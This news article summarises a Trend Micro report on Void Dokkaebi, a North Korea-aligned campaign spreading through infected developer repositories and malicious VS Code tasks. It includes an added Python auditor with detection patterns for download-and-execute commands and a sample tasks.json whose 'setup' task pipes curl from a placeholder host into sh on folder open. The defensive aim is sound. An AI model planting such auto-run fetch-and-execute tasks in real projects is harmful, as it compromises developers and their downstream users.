The scale of infection | Image: Trend Micro
A new report from researchers at Trend Micro has exposed the evolution of Void Dokkaebi (also known as Famous Chollima), a North Korea-aligned intrusion set that has transitioned from traditional social engineering to a self-propagating supply chain threat. The campaign is specifically designed to hunt software developers, seeking to harvest cryptocurrency credentials, signing keys, and high-value access to CI/CD pipelines.
What makes this campaign particularly dangerous is its ability to turn a victim into a vector. As the report notes, “A compromised developer’s repository becomes an infection vector for the next wave of victims, creating a worm-like propagation chain through the developer ecosystem”.
The campaign spreads by embedding itself into trusted development workflows. Attackers utilize malicious Visual Studio Code (VS Code) task configurations and injected code that activates during normal, everyday coding activities.
Once a developer’s local environment is compromised, the infection can spread horizontally:
- Organizational Exposure: When infected code is pushed to corporate repositories, it can compromise entire teams.
- Open-Source Contamination: Popular public projects can become “super-spreaders,” infecting contributors, downstream projects, and anyone who forks or clones the repository.
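As an added example (not code from the Trend Micro report), the routine below audits a repository's `.vscode/tasks.json` for the kind of task definition described above: one that runs automatically when the folder is opened or whose command line looks like a download-and-execute step. The heuristic patterns and the sample tasks.json are assumptions constructed for illustration; the `runOptions.runOn: "folderOpen"` setting is a real VS Code feature.

```python
"""Flag VS Code tasks that auto-run or launch download-and-execute commands (assumed heuristics)."""
import json
import re
from typing import Dict, List

# Command-line patterns a defender would treat as suspicious (assumed heuristics).
SUSPICIOUS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.I),  # download piped into a shell
    re.compile(r"base64\s+(-d|--decode)\b", re.I),         # decoding an embedded blob
    re.compile(r"powershell.*-(enc|encodedcommand)\b", re.I),
    re.compile(r"\beval\b", re.I),
    re.compile(r"https?://", re.I),  # any remote fetch from a build task deserves a look
]

def task_command(task: Dict) -> str:
    """Join a task's command and args into one string for pattern matching."""
    parts = [str(task.get("command", ""))]
    parts.extend(str(a) for a in task.get("args", []))
    return " ".join(parts)

def audit_tasks(tasks_json: str) -> List[Dict]:
    """Return one finding per task that auto-runs or matches a suspicious pattern."""
    doc = json.loads(tasks_json)  # assumes a comment-free tasks.json
    findings = []
    for task in doc.get("tasks", []):
        reasons = []
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            reasons.append("runs automatically when the folder is opened")
        cmd = task_command(task)
        for pat in SUSPICIOUS:
            if pat.search(cmd):
                reasons.append(f"command matches {pat.pattern!r}")
        if reasons:
            findings.append({"label": task.get("label", "<unnamed>"),
                             "command": cmd, "reasons": reasons})
    return findings

# Constructed sample: a benign build task beside one shaped like an auto-run dropper.
SAMPLE_TASKS_JSON = """{
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm", "args": ["run", "build"]},
    {"label": "setup", "type": "shell",
     "command": "curl -s https://example.invalid/s | sh",
     "runOptions": {"runOn": "folderOpen"}}
  ]
}"""
```

Running `audit_tasks(SAMPLE_TASKS_JSON)` returns a single finding for the `setup` task, listing the folder-open trigger and the two matched command patterns; the `build` task produces none.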
Analysis conducted in March 2026 revealed a staggering breadth of infection across the global coding landscape:
- 750+ Infected Repositories: Researchers identified over 750 public repositories carrying infection markers.
- 500+ Malicious VS Code Tasks: More than 500 configurations were found designed to execute malicious code.
- 101 Commit Tampering Tools: Evidence showed the threat actor had active remote access to at least 101 machines, using specialized tools to deliberately weaponize repositories.
The report highlights that the threat is not limited to independent developers. Repositories belonging to established organizations, such as DataStax and Neutralinojs, were also identified as carrying infection markers.
To ensure their delivery systems remain resilient against traditional security takedowns, Void Dokkaebi has turned to decentralized technology. The campaign uses blockchain infrastructure—including Tron, Aptos, and Binance Smart Chain—for staging its payloads. This tactic places the heart of their infrastructure beyond the reach of standard web hosting takedowns and law enforcement interventions.
Researchers warn that the numbers found in public scans represent only the tip of the iceberg. The actual scale is likely much larger, as the data does not account for:
- Private Repositories: Internal corporate code not indexed by public search tools.
- Cleaned Repositories: Projects that were infected and remediated before the scan took place.
- Unobserved Forks: Clones and forks that propagated the infection into environments researchers cannot monitor.
The Void Dokkaebi campaign represents a shift toward a self-sustaining model of cyber-espionage. By making a “relatively small, initial investment in social engineering,” the group has produced a massive, cascading infection surface.